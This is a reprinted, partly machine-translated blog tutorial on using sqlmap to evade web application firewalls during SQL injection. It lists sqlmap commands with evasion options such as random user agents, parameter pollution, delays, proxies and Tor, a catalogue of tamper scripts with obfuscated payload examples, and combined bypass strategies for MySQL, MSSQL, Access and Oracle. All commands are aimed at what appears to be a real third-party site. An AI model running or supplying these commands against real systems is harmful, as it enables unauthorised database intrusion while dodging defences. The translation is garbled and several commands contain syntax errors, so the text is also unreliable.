http://blog.csdn.net/qq_29277155/article/details/51193071
(Reprint) sqlmap bypass the firewall using injection test
0x00 Foreword
Now the network environment is often WAF / IPS / IDS to protect Web servers, etc. This protection is often blocked by our filter SQL injection query links, and even blocked our host IP, so this time, we must consider how to conduct bypass, achieve the target injection. Because now WAF / IPS / IDS regarded sqlmap blacklisted, and Oh! However Based sqlmap be bypassed injection test, introduced still practical and effective techniques, the following strategies can successfully bypassed in a particular environment, whether to bypass specific, carefully review the information output.
0x01 confirm WAF
First, we determine whether the Web server is WAF / IPS / IDS protected. This is easy to achieve, because we are missing sweep or use a special tool to detect whether there WAF, this detection, there are, we can use nmap in the NSE, or WVS of policy or strategy in these APPSCAN judge. Here we also introduce the use sqlmap to detect whether there WAF / IPS / IDS
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#备选
0x02 using parameter bypass
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 # using any browser to bypass, especially in WAF misallocation of time
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3 # to bypass using HTTP parameter pollution, especially in the ASP. NET / IIS platform on
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay = 3.5 --time-sec = 60 # used to avoid long delays WAF trigger mechanism, which is time-consuming way
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy = 211.211.211.211: 8080 --proxy-cred = 211: 985 # Use agent for injection
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy # prohibit the use of the agent system, direct connection injection
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session # empty session reconstruction injection
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex # or parameter --no-cast, character code conversion
root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile # mobile injection end server
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入
0x03 introduced using a script
1 using the format:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B
Script 2 general category
01 apostrophemask.py # marks replaced with utf8; Example: ( "1 AND '1' = '1")' 1 AND% EF% BC% 871% EF% BC% 87 =% EF% BC% 871 '
02 equaltolike.py#MSSQL * SQLite中like 代替等号;Example: Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1
Greatest.py # 03 the MySQL in bypassing the filter '>', with numbers greater than GREATEST replaced; Example: ( '1 AND A > B') '1 AND GREATEST (A, B + 1) = A'
04 space2hash.py # replace spaces and line breaks random string numbers #; Input: 1 AND 9227 = 9227; Output: 1% 23PTTmJopxdWJ% 0AAND% 23cWfcVRPV% 0A9227 = 9227
05 apostrophenullencode.py # MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL double quotes bypass the filter, replace characters and double quotes;
06 halfversionedmorekeywords.py # When the database to bypass the firewall when mysql, mysql version to add a comment before each keyword;
07 space2morehash.py # MySQL replace spaces in the # and more random string line breaks;
Load zero byte character code 08 appendnullbyte.py # Microsoft Access end position in the payload; Example: ( '1 AND 1 = 1') '1 AND 1 = 1% 00'
09 ifnull2ifisnull.py # MySQL, SQLite (possibly), SAP MaxDB bypassing the filter of IFNULL. Alternatively similar 'IFNULL (A, B)' of 'IF (ISNULL (A), B, A)'
10 space2mssqlblank.py (mssql) #mssql replaced by other empty spaces symbols
11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all
12 space2mssqlhash.py # replace spaces mssql query
13 modsecurityversioned.py # (mysql filtering space, contains a complete version of the query Notes; Example: ( '1 AND 2> 1--') '1 / * 30874AND 2> 1 * / -!'
14 space2mysqlblank.py # (mysql replaced with spaces other whitespace
15 between.py # MS SQL 2005, MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 replacement by between greater than (>)
16 space2mysqldash.py # MySQL, MSSQL replace the space character ( ") ( '-') followed by a dash comment on a new line ( 'n')
17 multiplespaces.py # add more spaces around SQL keywords; Example: ( '1 UNION SELECT foobar') '1 UNION SELECT foobar'
18 space2plus.py # replace spaces with +; Example: ( 'SELECT id FROM users') 'SELECT + id + FROM + users'
19 bluecoat.py # MySQL 5.1, after SGOS character instead of spaces with a valid random whitespace characters SQL statements. Like to then replace =
20 nonrecursivereplacement.py # double query. Replace predefined SQL keywords with representation suitable for alternative (eg .replace ( "SELECT", "")) filters
21 space2randomblank.py # instead of a space character ( "") alternate character from a random set of blank characters are valid
22 sp_password.py # append sp_password 'end of the payload 26 from the automatic log blurring processing DBMS
23 chardoubleencode.py # bis url encoding (coding not processed)
24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'
25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;
26 randomcase.py # Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0 in the random case
27 unmagicquotes.py # wide character bypass GPC addslashes; Example: * Input: 1 'AND 1 = 1 * Output: 1% bf% 27 AND 1 = 1-% 20
With 28 randomcomments.py # / ** / sql split key; Example: 'INSERT' becomes 'IN // S // ERT'
29 charunicodeencode.py # ASP, ASP.NET unicode string encoding;
30 securesphere.py # additional special string; Example: ( '1 AND 1 = 1') "1 AND 1 = 1 and '0having' = '0having'"
31 versionedmorekeywords.py # MySQL> = 5.1.13 Notes bypass
32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’
33 halfversionedmorekeywords.py # MySQL <5.1 keywords preceded by comments
0x04 script parameter to bypass the portfolio strategy
1 mysql bypass:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp --tamper=space2mysqldash.p,versionedmorekeywords.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py
NOTE: These strategies can be combined according to the feedback information injection, timely adjustment of portfolio strategy
2 MSSQL:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --tamper=unionalltounion.py,base64encode.p
3 ms access:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --tamper=appendnullbyte.py,space2plus.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --hpp --tamper=chardoubleencode.py
4 Oracle:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0” --hpp --tamper=charunicodeencode.py,chardoubleencode.py
5 建议:
因为WAF可能采用白名单规则,所以对于选择哪种策略,重点是根据-v 3 提示的信息进行判断,可以抓取主流的浏览器的user-agent ,s适当的延时,加上注入字符转换---大小写、空格、字符串、注释、加密等等方式
Given the parameters and the 32 scripts in our usual injection, to be tested by these different multiple combinations, this test is time-consuming or
ps: Reproduced source http://blog.csdn.net/qq_29277155/article/details/51193071, thanks to the author's share